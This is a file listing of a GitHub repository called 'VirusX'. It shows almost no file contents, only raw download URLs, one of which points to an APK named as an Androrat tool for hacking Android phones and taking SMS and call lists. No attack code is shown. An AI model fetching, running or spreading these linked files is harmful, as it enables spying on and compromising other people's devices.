├── .gitignore ├── LICENSE ├── README.md ├── VirusX.py ├── banner ├── banner4.py └── table.py ├── img ├── IMG_20200128_154104.jpg └── bnnr ├── script └── esprint.py └── virus ├── Androrat_Hacking_Android_Phone_(SMS_Call_list_amp_).apk └── VirusX.txt /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/.gitignore -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/README.md -------------------------------------------------------------------------------- /VirusX.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/VirusX.py -------------------------------------------------------------------------------- /banner/banner4.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/banner/banner4.py -------------------------------------------------------------------------------- /banner/table.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/banner/table.py -------------------------------------------------------------------------------- /img/IMG_20200128_154104.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/img/IMG_20200128_154104.jpg -------------------------------------------------------------------------------- /img/bnnr: -------------------------------------------------------------------------------- 1 | # 2 | -------------------------------------------------------------------------------- /script/esprint.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/script/esprint.py -------------------------------------------------------------------------------- /virus/Androrat_Hacking_Android_Phone_(SMS_Call_list_amp_).apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TSMaitry/VirusX/HEAD/virus/Androrat_Hacking_Android_Phone_(SMS_Call_list_amp_).apk -------------------------------------------------------------------------------- /virus/VirusX.txt: -------------------------------------------------------------------------------- 1 | VirusX 2 | --------------------------------------------------------------------------------